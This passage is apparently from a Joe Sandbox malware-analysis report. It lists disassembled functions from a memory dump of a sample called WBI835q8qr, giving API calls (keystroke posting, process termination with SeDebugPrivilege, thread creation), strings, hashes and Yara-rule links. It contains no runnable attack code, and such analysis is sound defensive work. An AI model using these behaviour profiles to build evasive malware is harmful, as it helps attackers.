Opcode Fuzzy Hash: 3311b7184741c0c0ee9ce9a307ea2555be8b55cd6f0f83ed74446e767e6f4e12
Instruction Fuzzy Hash: 0051C130608254BEEF249B28DC85FAD7BE5EB07320F6041A5F954E69A1CF76AD80CB40

Function 00B22B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B5C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B5C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B5C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B5C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B5C370
DestroyIcon.USER32(00000000), ref: 00B5C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B5C39C
DestroyIcon.USER32(?), ref: 00B5C3AB

Part of subcall function 00BAA4AF: DeleteObject.GDI32(00000000), ref: 00BAA4E8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: e6ac0e24c405a0982e3038a83e87727a30e138ed5641bf6adf72c9b7452bf049
Instruction ID: de9bd06e5d647c199be63eac1b7a00b97f025cbf73bb2b56746001aa06dbd5eb
Opcode Fuzzy Hash: e6ac0e24c405a0982e3038a83e87727a30e138ed5641bf6adf72c9b7452bf049
Instruction Fuzzy Hash: 8B516870A00309EFDB24DF64DC86BAA3BF6EB08311F1045A8F906D72A0DB70AD90DB50

Function 00B7966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B7A84C
Part of subcall function 00B7A82C: GetCurrentThreadId.KERNEL32 ref: 00B7A853
Part of subcall function 00B7A82C: AttachThreadInput.USER32(00000000,?,00B79683,?,00000001), ref: 00B7A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B7968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B796AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00B796AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B796B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B796D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B796D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B796E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B796F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B796FB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f8374942b7c384d9217e0920d158c880a3ba228ce4fd7188250ed833a0e1ff74
Instruction ID: ae3f8a71da54ced2648b8b577d0756e339047bbcf6284da08cd600fe7b999a59
Opcode Fuzzy Hash: f8374942b7c384d9217e0920d158c880a3ba228ce4fd7188250ed833a0e1ff74
Instruction Fuzzy Hash: 0111CEB1910619BEFA106FA49C8AFBA3A6DEB4D750F100425F358AB0E0CDF25C11DAA4

Function 00B78921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B7853C,00000B00,?,?), ref: 00B7892A
HeapAlloc.KERNEL32(00000000,?,00B7853C,00000B00,?,?), ref: 00B78931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B7853C,00000B00,?,?), ref: 00B78946
GetCurrentProcess.KERNEL32(?,00000000,?,00B7853C,00000B00,?,?), ref: 00B7894E
DuplicateHandle.KERNEL32(00000000,?,00B7853C,00000B00,?,?), ref: 00B78951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B7853C,00000B00,?,?), ref: 00B78961
GetCurrentProcess.KERNEL32(00B7853C,00000000,?,00B7853C,00000B00,?,?), ref: 00B78969
DuplicateHandle.KERNEL32(00000000,?,00B7853C,00000B00,?,?), ref: 00B7896C
CreateThread.KERNEL32(00000000,00000000,00B78992,00000000,00000000,00000000), ref: 00B78986

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: f5f5545bf981592484df75ff991cac6bd224f72df3d68d417e059ccfce47f494
Instruction ID: e560075e8663c6e04dc5597f19a9b16b0589e1790bc8cce01f7bef029adba188
Opcode Fuzzy Hash: f5f5545bf981592484df75ff991cac6bd224f72df3d68d417e059ccfce47f494
Instruction Fuzzy Hash: 7B01BF75240305FFE750ABE5DC4EFA73BACEB89711F418421FA05DB1A1DA709800CB60

Function 00B99B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00B99BA4, 00B99EC8
Not an Object type, xrefs: 00B99B7B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 61e17bf160bb73f60ee44d98e820d58325002e5f0452f312b8a6cac26127f602
Instruction ID: bc3bdb4875a1b88c9747c9d4af684b6c92f7b9cf6b1fc0cc275c08821cee1252
Opcode Fuzzy Hash: 61e17bf160bb73f60ee44d98e820d58325002e5f0452f312b8a6cac26127f602
Instruction Fuzzy Hash: 8DC19171A0020AABDF50DF9CD885AAEB7F5FF48314F1484BDE915AB281E770AD45CB90

Function 00B99113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B99167
VariantInit.OLEAUT32(?), ref: 00B99238
VariantInit.OLEAUT32(?), ref: 00B99339
VariantClear.OLEAUT32(?), ref: 00B99343
VariantClear.OLEAUT32(?), ref: 00B993A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00B9931C
Null Object assignment in FOR..IN loop, xrefs: 00B991C8, 00B992F6, 00B993AE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 2bff8282ebbef383cae191dfb6e0d38ea1ca0b7d83173bd69e0617b6035dcc1f
Instruction ID: a9289b23791c943bac3684f90c0553d07eb88dd44a62d8a95676b35a6dba2bef
Opcode Fuzzy Hash: 2bff8282ebbef383cae191dfb6e0d38ea1ca0b7d83173bd69e0617b6035dcc1f
Instruction Fuzzy Hash: D5918E71A04219ABDF64DFA9C888FAEB7F8EF45710F1081ADF515AB290D7709941CFA0

Function 00B9975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00B7710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?,?,00B77455), ref: 00B77127
Part of subcall function 00B7710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?), ref: 00B77142
Part of subcall function 00B7710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?,?), ref: 00B77150
Part of subcall function 00B7710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B77044,80070057,?), ref: 00B77160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B99806
_memset.LIBCMT ref: 00B99813
_memset.LIBCMT ref: 00B99956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B99982
CoTaskMemFree.OLE32(?), ref: 00B9998D

Strings

NULL Pointer assignment, xrefs: 00B999DB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 4b65294bb18de062c861edbac228b87af1a5f73f2b43ef17621ae24a19043aa1
Instruction ID: f4b1b1b35a2171af342b415944f19867d162aea34ba2e013d30c4a63f6a551dc
Opcode Fuzzy Hash: 4b65294bb18de062c861edbac228b87af1a5f73f2b43ef17621ae24a19043aa1
Instruction Fuzzy Hash: 9F910771D00229EBDF10DFA5DC85ADEBBB9EF09350F1041AAF419A7251DB715A44CBA0

Function 00BA6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BA6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00BA6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BA6E52
_wcscat.LIBCMT ref: 00BA6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00BA6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BA6EF2

Strings

SysListView32, xrefs: 00BA6DF6

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: d41c09efc17d786c64f925d1b85b9b4ca3c0a9ee77cb8b731859133c441c5381
Instruction ID: 9a194940e9db2609c20f5fef8cfcf19344f89ca9b9639e6100df82907d2bd68c
Opcode Fuzzy Hash: d41c09efc17d786c64f925d1b85b9b4ca3c0a9ee77cb8b731859133c441c5381
Instruction Fuzzy Hash: 70419371A04349AFEB219FA4CC85BEA77E8EF09350F1404AAF584E7291D6719D84CB60

Function 00B9E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00B83C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00B83C7A
Part of subcall function 00B83C55: Process32FirstW.KERNEL32(00000000,?), ref: 00B83C88
Part of subcall function 00B83C55: CloseHandle.KERNEL32(00000000), ref: 00B83D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9E9A4
GetLastError.KERNEL32 ref: 00B9E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B9EA63
GetLastError.KERNEL32(00000000), ref: 00B9EA6E
CloseHandle.KERNEL32(00000000), ref: 00B9EAA3

Strings

SeDebugPrivilege, xrefs: 00B9E9C2

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: c9d63cd61954d73fe5e8e53a4f555eca903ca6e464f5bd69abeb25546ba116e3
Instruction ID: 3be5fb9071c74663a70448b46d0fbecdd3974b215698e8f0b403b13aad12418d
Opcode Fuzzy Hash: c9d63cd61954d73fe5e8e53a4f555eca903ca6e464f5bd69abeb25546ba116e3
Instruction Fuzzy Hash: 8D41BB712002019FDB14EF64CC96F6EB7E5AF40710F1884A8F91A9F2E2CB74E904CB95

Function 00B82F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B83033

Strings

stop, xrefs: 00B83004
info, xrefs: 00B82FD4
question, xrefs: 00B82FEC
warning, xrefs: 00B8301C
blank, xrefs: 00B82FB5

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 7f5c787c044eac575866073cc1aa214d52f9229ec2e8ba02282aaeae81a2382b
Instruction ID: 503b421f8377aa1cf1101b173f9f200eedcbd18e63e929c7ef498943b80a9898
Opcode Fuzzy Hash: 7f5c787c044eac575866073cc1aa214d52f9229ec2e8ba02282aaeae81a2382b
Instruction Fuzzy Hash: A811EE313483467ED7146B54DC82D6B77DCDF25F64B1000EAF900A6291EF719F40A7A5

Function 00B842F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B84312
LoadStringW.USER32(00000000), ref: 00B84319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B8432F
LoadStringW.USER32(00000000), ref: 00B84336
_wprintf.LIBCMT ref: 00B8435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B8437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B84357

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 339fd7be68e95326b1a89837614b817855119f0fd0150b96dd02069e826f985b
Instruction ID: 4eb55433023c49ec90a737ab20f0a477cafdb7429c22b2816a3a68bc7ecf8a5c
Opcode Fuzzy Hash: 339fd7be68e95326b1a89837614b817855119f0fd0150b96dd02069e826f985b
Instruction Fuzzy Hash: BE014FF2940209BFE751A7E4DD8AEF677ACDB09701F0005A2B745E3051EA749E858B74

Function 00BAD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

GetSystemMetrics.USER32(0000000F), ref: 00BAD47C
GetSystemMetrics.USER32(0000000F), ref: 00BAD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BAD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BAD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BAD716
ShowWindow.USER32(00000003,00000000), ref: 00BAD735
InvalidateRect.USER32(?,00000000,00000001), ref: 00BAD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00BAD77D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 6a62e7e71202106a36cb0c9051cd86947fbb9ad9fd016f0202eb7e3fc22bf7ce
Instruction ID: a59d972289920fe6d37e2c3a97507870045506124ae175a4979531dd1fd956c1
Opcode Fuzzy Hash: 6a62e7e71202106a36cb0c9051cd86947fbb9ad9fd016f0202eb7e3fc22bf7ce
Instruction Fuzzy Hash: 29B17A75604225ABDF18CF68C9C57AD7BF1FF09701F0880A9EC4A9B695DB34AD50CB90

Function 00B22A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B5C1C7,00000004,00000000,00000000,00000000), ref: 00B22ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B5C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00B22B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B5C1C7,00000004,00000000,00000000,00000000), ref: 00B5C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B5C1C7,00000004,00000000,00000000,00000000), ref: 00B5C286

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 478f651fa6028e6d3ef0d5b7491556c069e3226431e94683d898ce7defd67073
Instruction ID: 9dc003bc6c8d1e27589db672f519d5bf225b99364be2a20f2af5233d461937b0
Opcode Fuzzy Hash: 478f651fa6028e6d3ef0d5b7491556c069e3226431e94683d898ce7defd67073
Instruction Fuzzy Hash: DC41B631604B90BEC7358B68ACCDB7A7BD2EB47310F1488E9E54AC7961CA759886D710

Function 00B870C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B870DD

Part of subcall function 00B40DB6: std::exception::exception.LIBCMT ref: 00B40DEC
Part of subcall function 00B40DB6: __CxxThrowException@8.LIBCMT ref: 00B40E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B87114
EnterCriticalSection.KERNEL32(?), ref: 00B87130
_memmove.LIBCMT ref: 00B8717E
_memmove.LIBCMT ref: 00B8719B
LeaveCriticalSection.KERNEL32(?), ref: 00B871AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B871BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B871DE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 15676e262dad65319a766e939b8daffab8f6efdcd8de46c98593aa97a5b0ef63
Instruction ID: 3df429b1d0c536b20e942f0abd7ec4b5df544bcf94aaea632d0a3ace706b0a69
Opcode Fuzzy Hash: 15676e262dad65319a766e939b8daffab8f6efdcd8de46c98593aa97a5b0ef63
Instruction Fuzzy Hash: 45315D31900205EBDF10EFA5DC89AAAB7B8EF45710F2441B5F904AB256DB30DA14DBA1

Function 00BA61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BA61EB
GetDC.USER32(00000000), ref: 00BA61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA61FE
ReleaseDC.USER32(00000000,00000000), ref: 00BA620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BA6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BA6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BA902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00BA6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BA62B1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4c4ee01155407eccee2dde352c60e5bb45b6f51b1e177cc4cdccc0525e91e4e7
Instruction ID: f2fd46332aa9de87c1f2ec9b4617f8ae034ff2ff867f3a2cb93f30ea291061bb
Opcode Fuzzy Hash: 4c4ee01155407eccee2dde352c60e5bb45b6f51b1e177cc4cdccc0525e91e4e7
Instruction Fuzzy Hash: 10314F72101214BFEB218F54CC8AFFB3FA9EF4A765F084065FE089A191CA759C41CB64

Function 00B7BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00B7BBC4
_memcmp.LIBCMT ref: 00B7BBE6
_memcmp.LIBCMT ref: 00B7BBFE
_memcmp.LIBCMT ref: 00B7BC11
_memcmp.LIBCMT ref: 00B7BC2B
_memcmp.LIBCMT ref: 00B7BC3E
_memcmp.LIBCMT ref: 00B7BC56
_memcmp.LIBCMT ref: 00B7BC71

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
